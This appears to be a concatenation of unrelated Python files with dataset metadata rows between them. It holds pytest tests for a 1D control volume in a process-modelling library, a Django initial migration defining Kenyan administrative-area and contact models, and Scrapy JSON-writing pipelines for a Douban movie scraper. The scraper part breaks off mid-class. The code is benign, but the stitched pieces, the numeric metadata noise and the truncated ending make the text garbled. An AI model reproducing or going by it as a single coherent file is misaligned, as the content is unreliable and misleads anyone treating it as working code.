    balances = model.fs.cv.add_total_pressure_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    # cv.pressure is a Reference to the state block pressure
    assert isinstance(model.fs.cv.pressure, Var)
    assert isinstance(model.fs.cv.pressure_dx, DerivativeVar)

    # BACKWARD scheme: no constraint at the inlet (x = 0), one at x = 1
    with pytest.raises(KeyError):
        assert model.fs.cv.pressure_balance[0, 0]
    assert type(model.fs.cv.pressure_balance[0, 1]) is _GeneralConstraintData

    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_pressure_balances_default_FFD():
    """Total pressure balance with FORWARD finite differences skips the outlet."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "FORWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_pressure_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    # cv.pressure is a Reference to the state block pressure
    assert isinstance(model.fs.cv.pressure, Var)
    assert isinstance(model.fs.cv.pressure_dx, DerivativeVar)

    # FORWARD scheme: no constraint at the outlet (x = 1), one at x = 0
    with pytest.raises(KeyError):
        assert model.fs.cv.pressure_balance[0, 1]
    assert type(model.fs.cv.pressure_balance[0, 0]) is _GeneralConstraintData

    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_pressure_balances_deltaP():
    """has_pressure_change=True adds a deltaP Var to the pressure balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_pressure_balances(
        has_pressure_change=True)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv.deltaP, Var)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_pressure_balances_custom_term():
    """A user-supplied custom term is accepted by the total pressure balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    model.fs.cv.test_var = Var(model.fs.cv.flowsheet().config.time)

    def custom_method(t, x):
        # Custom term must carry pressure-per-length units
        return model.fs.cv.test_var[t] * units.Pa / units.m

    balances = model.fs.cv.add_total_pressure_balances(
        custom_term=custom_method)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert_units_consistent(model)
# -----------------------------------------------------------------------------
# Test unsupported momentum balance types
@pytest.mark.unit
def test_add_phase_pressure_balances():
    """add_phase_pressure_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_phase_pressure_balances()
@pytest.mark.unit
def test_add_phase_momentum_balances():
    """add_phase_momentum_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_phase_momentum_balances()
@pytest.mark.unit
def test_add_total_momentum_balances():
    """add_total_momentum_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_total_momentum_balances()
# -----------------------------------------------------------------------------
# Test model checks, initialize and release_state
@pytest.mark.unit
def test_model_checks():
    """model_check propagates to every property and reaction block."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    model.fs.cv.model_check()

    # Every (time, length) sub-block must have had its check method called
    for t in model.fs.time:
        for x in model.fs.cv.length_domain:
            assert model.fs.cv.properties[t, x].check is True
            assert model.fs.cv.reactions[t, x].check is True
@pytest.mark.unit
def test_initialize():
    """initialize propagates to every property and reaction block."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    model.fs.cv.initialize()

    # Every (time, length) sub-block must have been initialized
    for t in model.fs.time:
        for x in model.fs.cv.length_domain:
            assert model.fs.cv.properties[t, x].init_test is True
            assert model.fs.cv.reactions[t, x].init_test is True
@pytest.mark.unit
def test_report():
    """report() on a 1D control volume raises NotImplementedError.

    Reports are not yet supported on 1D models because distributed data is
    difficult to summarise concisely; the method should tell the user so.
    """
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    with pytest.raises(NotImplementedError):
        model.fs.cv.report()
| 35.925561
| 81
| 0.653336
| 14,896
| 120,171
| 5.043569
| 0.024235
| 0.063411
| 0.051977
| 0.042913
| 0.954997
| 0.951257
| 0.942046
| 0.929029
| 0.912324
| 0.898455
| 0
| 0.00653
| 0.212472
| 120,171
| 3,344
| 82
| 35.936304
| 0.787326
| 0.02935
| 0
| 0.861834
| 0
| 0
| 0.147237
| 0.067562
| 0
| 0
| 0
| 0
| 0.116139
| 1
| 0.059672
| false
| 0
| 0.004806
| 0.007609
| 0.072887
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
606a39fc486ac3e25bc8fcca5c8447b379141abf
| 21,401
|
py
|
Python
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 19
|
2015-04-16T09:37:08.000Z
|
2022-02-10T11:50:30.000Z
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 125
|
2015-03-26T14:05:49.000Z
|
2020-05-14T08:16:50.000Z
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 39
|
2015-04-15T09:17:33.000Z
|
2022-03-28T18:08:16.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import common.models.base
import django.db.models.deletion
import common.models.model_declarations
import django.utils.timezone
from django.conf import settings
import common.fields
import uuid
class Migration(migrations.Migration):
    """Initial schema for the ``common`` app.

    Creates the administrative-area hierarchy (County -> Constituency ->
    Ward, plus SubCounty and Town), the contact models (ContactType,
    Contact), physical addresses, document uploads, and the user-to-area
    link tables (UserCounty, UserConstituency, UserContact).

    Shared conventions visible below:
      * every model carries the audit columns id/created/updated/deleted/
        active/search plus created_by/updated_by FKs to AUTH_USER_MODEL;
      * models with a ``code`` SequenceField also mix in
        ``common.models.base.SequenceMixin`` (auto-assigns the code);
      * circular references (e.g. Contact -> ContactType,
        Constituency -> County) are added afterwards via AddField.
    """

    dependencies = [
        # Needed because of the created_by/updated_by FKs on every model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Constituency',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
                ('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'abstract': False,
                'verbose_name_plural': 'constituencies',
                'default_permissions': ('add', 'change', 'delete', 'view'),
            },
            bases=(common.models.base.SequenceMixin, models.Model),
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('contact', models.CharField(help_text=b'The actual contact of the person e.g test@mail.com, 07XXYYYZZZ', max_length=100)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view'),
            },
        ),
        migrations.CreateModel(
            name='ContactType',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'A short name, preferably 6 characters long, representing a certain type of contact e.g EMAIL', unique=True, max_length=100)),
                ('description', models.TextField(help_text=b'A brief description of the contact type.', null=True, blank=True)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='County',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
                ('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
                'verbose_name_plural': 'counties',
            },
            bases=(common.models.base.SequenceMixin, models.Model),
        ),
        migrations.CreateModel(
            name='DocumentUpload',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(unique=True, max_length=255)),
                ('description', models.TextField(null=True, blank=True)),
                ('fyl', models.FileField(upload_to=b'')),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PhysicalAddress',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('nearest_landmark', models.TextField(help_text=b'well-known physical features /structure that can be used to simplify directions to a given place. e.g town market or village ', null=True, blank=True)),
                ('plot_number', models.CharField(help_text=b'This is the same number found on the title deeds of thepiece of land on which this facility is located', max_length=100, null=True, blank=True)),
                ('location_desc', models.TextField(help_text=b'This field allows a more detailed description of the location', null=True, blank=True)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
                'verbose_name_plural': 'physical addresses',
            },
        ),
        migrations.CreateModel(
            name='SubCounty',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
                ('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
                ('county', models.ForeignKey(to='common.County', on_delete=django.db.models.deletion.PROTECT)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
            bases=(common.models.base.SequenceMixin, models.Model),
        ),
        migrations.CreateModel(
            name='Town',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'Name of the town', max_length=255, unique=True, null=True, blank=True)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='UserConstituency',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('constituency', models.ForeignKey(to='common.Constituency')),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(related_name='user_constituencies', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'user constituencies',
            },
            bases=(common.models.model_declarations.UserAdminAreaLinkageMixin, models.Model),
        ),
        migrations.CreateModel(
            name='UserContact',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('contact', models.ForeignKey(to='common.Contact')),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(related_name='user_contacts', on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='UserCounty',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('county', models.ForeignKey(to='common.County', on_delete=django.db.models.deletion.PROTECT)),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(related_name='user_counties', on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
                'verbose_name_plural': 'user_counties',
            },
            bases=(common.models.model_declarations.UserAdminAreaLinkageMixin, models.Model),
        ),
        migrations.CreateModel(
            name='Ward',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=django.utils.timezone.now)),
                ('deleted', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
                ('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
                ('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
                ('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
                ('constituency', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.Constituency', help_text=b'The constituency where the ward is located.')),
                ('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
                ('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('-updated', '-created'),
                'default_permissions': ('add', 'change', 'delete', 'view'),
                'abstract': False,
            },
            bases=(common.models.base.SequenceMixin, models.Model),
        ),
        # FKs added after both sides of the relation exist.
        migrations.AddField(
            model_name='physicaladdress',
            name='town',
            field=models.ForeignKey(blank=True, to='common.Town', help_text=b'The town where the entity is located e.g Nakuru', null=True),
        ),
        migrations.AddField(
            model_name='physicaladdress',
            name='updated_by',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='contact',
            name='contact_type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.ContactType', help_text=b'The type of contact that the given contact is e.g email or phone number'),
        ),
        migrations.AddField(
            model_name='contact',
            name='created_by',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='contact',
            name='updated_by',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='constituency',
            name='county',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.County', help_text=b'Name of the county where the constituency is located'),
        ),
        migrations.AddField(
            model_name='constituency',
            name='created_by',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='constituency',
            name='updated_by',
            field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
        ),
        # Composite uniqueness constraints, added once all columns exist.
        migrations.AlterUniqueTogether(
            name='contact',
            unique_together=set([('contact', 'contact_type')]),
        ),
        migrations.AlterUniqueTogether(
            name='constituency',
            unique_together=set([('name', 'county')]),
        ),
    ]
| 67.939683
| 218
| 0.62941
| 2,302
| 21,401
| 5.698523
| 0.079931
| 0.042689
| 0.034152
| 0.053667
| 0.864995
| 0.851959
| 0.824745
| 0.824745
| 0.824745
| 0.824745
| 0
| 0.005052
| 0.232326
| 21,401
| 314
| 219
| 68.156051
| 0.793414
| 0.000981
| 0
| 0.772727
| 0
| 0.003247
| 0.181495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029221
| 0
| 0.038961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
608d25f2a8f2b2c946ba00dacdd868f4bba234c8
| 8,684
|
py
|
Python
|
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
import json
import codecs
from twisted.enterprise import adbapi
from datetime import datetime
from hashlib import md5
class MovieItemPipeline(object):
    """Append each scraped movie item to ./data/movie_item.json, one JSON object per line."""

    def __init__(self):
        # utf-8 output pairs with ensure_ascii=False below so non-ASCII
        # text (e.g. Chinese titles) is written readably.
        self.file = codecs.open('./data/movie_item.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically when the spider
        # finishes; the original spider_closed() was never invoked unless
        # manually connected to a signal, leaking the (buffered) file handle.
        self.file.close()

    # Backward-compatible alias for any code using the old method name.
    spider_closed = close_spider
################ People ####################
class MovieXPeoplePipeline1040(object):
    """Append scraped people items (batch 1040) to ./data/movie_Xpeople1040.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_Xpeople1040.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline5000(object):
    """Append scraped people items (batch 5000) to ./data/movie_people5000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people5000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline10000(object):
